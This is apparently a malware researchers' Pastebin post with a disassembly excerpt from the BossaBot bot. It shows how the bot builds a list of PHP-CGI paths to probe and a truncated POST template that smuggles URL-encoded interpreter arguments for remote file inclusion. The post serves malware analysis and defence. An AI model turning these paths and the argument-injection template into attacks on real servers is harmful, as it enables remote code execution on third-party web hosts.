SHARE
TWEET

Redundant dirs for RFI attack BossaBot #Malwaremustdie!

MalwareMustDie Sep 8th, 2014 (edited) 274 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Malwaremustdie!
  2. // redundant attack RFI by BossaBot
  3.  
  4.    :
  5. .text:0x80049B58 push ebp
  6. .text:0x80049B59 mov ebp, esp
  7. .text:0x80049B5B push edi
  8. .text:0x80049B5C push esi
  9. .text:0x80049B5D push ebx
  10. .text:0x80049B5E mov eax, offset aPostS?2d64616c ; "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%"...
  11. .text:0x80049B63 sub esp, 0AE8h ; Integer Subtraction
  12. .text:0x80049B69 cld ; Clear Direction Flag
  13. .text:0x80049B6A mov esi, eax
  14. .text:0x80049B6C mov ecx, 125h
  15. .text:0x80049B71 lea edi, [ebp+var_4B8] ; Load Effective Address
  16. .text:0x80049B77 rep movsd ; Move Byte(s) from String to String
  17. .text:0x80049B79 mov eax, offset a?phpTmpSys_get ; "<?php\n$tmp = sys_get_temp_dir();\n$path "...
  18. .text:0x80049B7E movsb ; Move Byte(s) from String to String
  19. .text:0x80049B7F mov ecx, 63h
  20. .text:0x80049B84 mov esi, eax
  21. .text:0x80049B86 lea edi, [ebp+var_648] ; Load Effective Address
  22. .text:0x80049B8C rep movsd ; Move Byte(s) from String to String
  23. .text:0x80049B8E movsw ; Move Byte(s) from String to String
  24. .text:0x80049B90 movsb ; Move Byte(s) from String to String
  25. .text:0x80049B91 push [ebp+size] ; size
  26. .text:0x80049B94 call _gethostbyname ; Call Procedure
  27. .text:0x80049B99 mov ds:dword_0x8051B00, eax
  28. .text:0x80049B9E mov [esp+0AF8h+var_AF8], 0Dh
  29. .text:0x80049BA5 call _malloc ; Call Procedure
  30. .text:0x80049BAA add esp, 10h ; Add
  31. .text:0x80049BAD test eax, eax ; Logical Compare
  32. .text:0x80049BAF jz short loc_0x8049BC2 ; Jump if Zero (ZF=1)
  33. .text:0x80049BB1 push ecx
  34. .text:0x80049BB2 push 0Dh ; size_t
  35. .text:0x80049BB4 push offset aCgiBinPhp ; "/cgi-bin/php"
  36. .text:0x80049BB9 push eax ; void *
  37. .text:0x80049BBA call _memcpy ; Call Procedure
  38. .text:0x80049BBF add esp, 10h ; Add
  39. .text:0x80049BC2
  40. .text:0x80049BC2 loc_0x8049BC2: ; cod xref:: sub_0x8049B58+57
  41. .text:0x80049BC2 sub esp, 0Ch ; Integer Subtraction
  42. .text:0x80049BC5 push 0Eh ; size
  43. .text:0x80049BC7 mov [ebp+var_AA8], eax
  44. .text:0x80049BCD call _malloc ; Call Procedure
  45. .text:0x80049BD2 add esp, 10h ; Add
  46. .text:0x80049BD5 test eax, eax ; Logical Compare
  47. .text:0x80049BD7 jz short loc_0x8049BEA ; Jump if Zero (ZF=1)
  48. .text:0x80049BD9 push edx
  49. .text:0x80049BDA push 0Eh ; size_t
  50. .text:0x80049BDC push offset aCgiBinPhp5 ; "/cgi-bin/php5"
  51. .text:0x80049BE1 push eax ; void *
  52. .text:0x80049BE2 call _memcpy ; Call Procedure
  53. .text:0x80049BE7 add esp, 10h ; Add
  54. .text:0x80049BEA
  55. .text:0x80049BEA loc_0x8049BEA: ; cod xref:: sub_0x8049B58+7F
  56. .text:0x80049BEA sub esp, 0Ch ; Integer Subtraction
  57. .text:0x80049BED push 11h ; size
  58. .text:0x80049BEF mov [ebp+var_AA4], eax
  59. .text:0x80049BF5 call _malloc ; Call Procedure
  60. .text:0x80049BFA add esp, 10h ; Add
  61. .text:0x80049BFD test eax, eax ; Logical Compare
  62. .text:0x80049BFF jz short loc_0x8049C12 ; Jump if Zero (ZF=1)
  63. .text:0x80049C01 push edi
  64. .text:0x80049C02 push 11h ; size_t
  65. .text:0x80049C04 push offset aCgiBinPhpCgi ; "/cgi-bin/php-cgi"
  66. .text:0x80049C09 push eax ; void *
  67. .text:0x80049C0A call _memcpy ; Call Procedure
  68. .text:0x80049C0F add esp, 10h ; Add
  69. .text:0x80049C12
  70. .text:0x80049C12 loc_0x8049C12: ; cod xref:: sub_0x8049B58+A7
  71. .text:0x80049C12 sub esp, 0Ch ; Integer Subtraction
  72. .text:0x80049C15 push 11h ; size
  73. .text:0x80049C17 mov [ebp+var_AA0], eax
  74. .text:0x80049C1D call _malloc ; Call Procedure
  75. .text:0x80049C22 add esp, 10h ; Add
  76. .text:0x80049C25 test eax, eax ; Logical Compare
  77. .text:0x80049C27 jz short loc_0x8049C3A ; Jump if Zero (ZF=1)
  78. .text:0x80049C29 push esi
  79. .text:0x80049C2A push 11h ; size_t
  80. .text:0x80049C2C push offset aCgiBinPhp_cgi ; "/cgi-bin/php.cgi"
  81. .text:0x80049C31 push eax ; void *
  82. .text:0x80049C32 call _memcpy ; Call Procedure
  83. .text:0x80049C37 add esp, 10h ; Add
  84. .text:0x80049C3A
  85. .text:0x80049C3A loc_0x8049C3A: ; cod xref:: sub_0x8049B58+CF
  86. .text:0x80049C3A sub esp, 0Ch ; Integer Subtraction
  87. .text:0x80049C3D push 0Eh ; size
  88. .text:0x80049C3F mov [ebp+var_A9C], eax
  89. .text:0x80049C45 call _malloc ; Call Procedure
  90. .text:0x80049C4A add esp, 10h ; Add
  91. .text:0x80049C4D test eax, eax ; Logical Compare
  92. .text:0x80049C4F jz short loc_0x8049C62 ; Jump if Zero (ZF=1)
  93. .text:0x80049C51 push ebx
  94. .text:0x80049C52 push 0Eh ; size_t
  95. .text:0x80049C54 push offset aCgiBinPhp4 ; "/cgi-bin/php4"
  96. .text:0x80049C59 push eax ; void *
  97. .text:0x80049C5A call _memcpy ; Call Procedure
  98. .text:0x80049C5F add esp, 10h ; Add
  99. .text:0x80049C62
  100. .text:0x80049C62 loc_0x8049C62: ; cod xref:: sub_0x8049B58+F7
  101. .text:0x80049C62 sub esp, 0Ch ; Integer Subtraction
  102. .text:0x80049C65 push 12h ; size
  103. .text:0x80049C67 mov [ebp+var_A98], eax
  104. .text:0x80049C6D call _malloc ; Call Procedure
  105. .text:0x80049C72 add esp, 10h ; Add
  106. .text:0x80049C75 test eax, eax ; Logical Compare
  107. .text:0x80049C77 jz short loc_0x8049C8A ; Jump if Zero (ZF=1)
  108. .text:0x80049C79 push ecx
  109. .text:0x80049C7A push 12h ; size_t
  110. .text:0x80049C7C push offset aCgiBinPhp5Cgi ; "/cgi-bin/php5-cgi"
  111. .text:0x80049C81 push eax ; void *
  112. .text:0x80049C82 call _memcpy ; Call Procedure
  113. .text:0x80049C87 add esp, 10h ; Add
  114. .text:0x80049C8A
  115. .text:0x80049C8A loc_0x8049C8A: ; cod xref:: sub_0x8049B58+11F
  116. .text:0x80049C8A sub esp, 0Ch ; Integer Subtraction
  117. .text:0x80049C8D push 12h ; size
  118. .text:0x80049C8F mov [ebp+var_A94], eax
  119. .text:0x80049C95 call _malloc ; Call Procedure
  120. .text:0x80049C9A add esp, 10h ; Add
  121. .text:0x80049C9D test eax, eax ; Logical Compare
  122. .text:0x80049C9F jz short loc_0x8049CB2 ; Jump if Zero (ZF=1)
  123. .text:0x80049CA1 push edx
  124. .text:0x80049CA2 push 12h ; size_t
  125. .text:0x80049CA4 push offset aCgiBinPhp4Cgi ; "/cgi-bin/php4-cgi"
  126. .text:0x80049CA9 push eax ; void *
  127. .text:0x80049CAA call _memcpy ; Call Procedure
  128. .text:0x80049CAF add esp, 10h ; Add
  129. .text:0x80049CB2
  130. .text:0x80049CB2 loc_0x8049CB2: ; cod xref:: sub_0x8049B58+147
  131. .text:0x80049CB2 sub esp, 0Ch ; Integer Subtraction
  132. .text:0x80049CB5 push 12h ; size
  133. .text:0x80049CB7 mov [ebp+var_A90], eax
  134. .text:0x80049CBD call _malloc ; Call Procedure
  135. .text:0x80049CC2 add esp, 10h ; Add
  136. .text:0x80049CC5 test eax, eax ; Logical Compare
  137. .text:0x80049CC7 jz short loc_0x8049CDA ; Jump if Zero (ZF=1)
  138. .text:0x80049CC9 push edi
  139. .text:0x80049CCA push 12h ; size_t
  140. .text:0x80049CCC push offset aCgiBinPhp5_cgi ; "/cgi-bin/php5.cgi"
  141. .text:0x80049CD1 push eax ; void *
  142. .text:0x80049CD2 call _memcpy ; Call Procedure
  143. .text:0x80049CD7 add esp, 10h ; Add
  144. .text:0x80049CDA
  145. .text:0x80049CDA loc_0x8049CDA: ; cod xref:: sub_0x8049B58+16F
  146. .text:0x80049CDA sub esp, 0Ch ; Integer Subtraction
  147. .text:0x80049CDD push 12h ; size
  148. .text:0x80049CDF mov [ebp+var_A8C], eax
  149. .text:0x80049CE5 call _malloc ; Call Procedure
  150. .text:0x80049CEA add esp, 10h ; Add
  151. .text:0x80049CED test eax, eax ; Logical Compare
  152. .text:0x80049CEF jz short loc_0x8049D02 ; Jump if Zero (ZF=1)
  153. .text:0x80049CF1 push esi
  154. .text:0x80049CF2 push 12h ; size_t
  155. .text:0x80049CF4 push offset aCgiBinPhp4_cgi ; "/cgi-bin/php4.cgi"
  156. .text:0x80049CF9 push eax ; void *
  157. .text:0x80049CFA call _memcpy ; Call Procedure
  158. .text:0x80049CFF add esp, 10h ; Add
  159. .text:0x80049D02
  160. .text:0x80049D02 loc_0x8049D02: ; cod xref:: sub_0x8049B58+197
  161. .text:0x80049D02 sub esp, 0Ch ; Integer Subtraction
  162. .text:0x80049D05 push 13h ; size
  163. .text:0x80049D07 mov [ebp+var_A88], eax
  164. .text:0x80049D0D call _malloc ; Call Procedure
  165. .text:0x80049D12 add esp, 10h ; Add
  166. .text:0x80049D15 test eax, eax ; Logical Compare
  167. .text:0x80049D17 jz short loc_0x8049D2A ; Jump if Zero (ZF=1)
  168. .text:0x80049D19 push ebx
  169. .text:0x80049D1A push 13h ; size_t
  170. .text:0x80049D1C push offset aCgiBinPhp52_cg ; "/cgi-bin/php52.cgi"
  171. .text:0x80049D21 push eax ; void *
  172. .text:0x80049D22 call _memcpy ; Call Procedure
  173. .text:0x80049D27 add esp, 10h ; Add
  174. .text:0x80049D2A
  175. .text:0x80049D2A loc_0x8049D2A: ; cod xref:: sub_0x8049B58+1BF
  176. .text:0x80049D2A sub esp, 0Ch ; Integer Subtraction
  177. .text:0x80049D2D push 13h ; size
  178. .text:0x80049D2F mov [ebp+var_A84], eax
  179. .text:0x80049D35 call _malloc ; Call Procedure
  180. .text:0x80049D3A add esp, 10h ; Add
  181. .text:0x80049D3D test eax, eax ; Logical Compare
  182. .text:0x80049D3F jz short loc_0x8049D52 ; Jump if Zero (ZF=1)
  183. .text:0x80049D41 push ecx
  184. .text:0x80049D42 push 13h ; size_t
  185. .text:0x80049D44 push offset aCgiBinPhp53_cg ; "/cgi-bin/php53.cgi"
  186. .text:0x80049D49 push eax ; void *
  187. .text:0x80049D4A call _memcpy ; Call Procedure
  188. .text:0x80049D4F add esp, 10h ; Add
  189. .text:0x80049D52
  190. .text:0x80049D52 loc_0x8049D52: ; cod xref:: sub_0x8049B58+1E7
  191. .text:0x80049D52 sub esp, 0Ch ; Integer Subtraction
  192. .text:0x80049D55 push 0Ah ; size
  193. .text:0x80049D57 mov [ebp+var_A80], eax
  194. .text:0x80049D5D call _malloc ; Call Procedure
  195. .text:0x80049D62 add esp, 10h ; Add
  196. .text:0x80049D65 test eax, eax ; Logical Compare
  197. .text:0x80049D67 jz short loc_0x8049D7A ; Jump if Zero (ZF=1)
  198. .text:0x80049D69 push edx
  199. .text:0x80049D6A push 0Ah ; size_t
  200. .text:0x80049D6C push offset aCgiBin ; "/cgi-bin/"
  201. .text:0x80049D71 push eax ; void *
  202. .text:0x80049D72 call _memcpy ; Call Procedure
  203. .text:0x80049D77 add esp, 10h ; Add
  204. .text:0x80049D7A
  205. .text:0x80049D7A loc_0x8049D7A: ; cod xref:: sub_0x8049B58+20F
  206. .text:0x80049D7A sub esp, 0Ch ; Integer Subtraction
  207. .text:0x80049D7D push 11h ; size
  208. .text:0x80049D7F mov [ebp+var_A7C], eax
  209. .text:0x80049D85 call _malloc ; Call Procedure
  210. .text:0x80049D8A add esp, 10h ; Add
  211. .text:0x80049D8D test eax, eax ; Logical Compare
  212. .text:0x80049D8F jz short loc_0x8049DA2 ; Jump if Zero (ZF=1)
  213. .text:0x80049D91 push edi
  214. .text:0x80049D92 push 11h ; size_t
  215. .text:0x80049D94 push offset aCgiSysPhpCgi ; "/cgi-sys/php-cgi"
  216. .text:0x80049D99 push eax ; void *
  217. .text:0x80049D9A call _memcpy ; Call Procedure
  218. .text:0x80049D9F add esp, 10h ; Add
  219. .text:0x80049DA2
  220. .text:0x80049DA2 loc_0x8049DA2: ; cod xref:: sub_0x8049B58+237
  221. .text:0x80049DA2 sub esp, 0Ch ; Integer Subtraction
  222. .text:0x80049DA5 push 2 ; size
  223. .text:0x80049DA7 mov [ebp+var_A78], eax
  224. .text:0x80049DAD call _malloc ; Call Procedure
  225. .text:0x80049DB2 add esp, 10h ; Add
  226. .text:0x80049DB5 test eax, eax ; Logical Compare
  227. .text:0x80049DB7 jz short loc_0x8049DCA ; Jump if Zero (ZF=1)
  228. .text:0x80049DB9 push esi
  229. .text:0x80049DBA push 2 ; size_t
  230. .text:0x80049DBC push 804DF2Bh ; void *
  231. .text:0x80049DC1 push eax ; void *
  232. .text:0x80049DC2 call _memcpy ; Call Procedure
  233. .text:0x80049DC7 add esp, 10h ; Add
  234.         :
  235.  
  236. ;;---------
  237. ;; #MalwareMustDie!!
RAW Paste Data
Top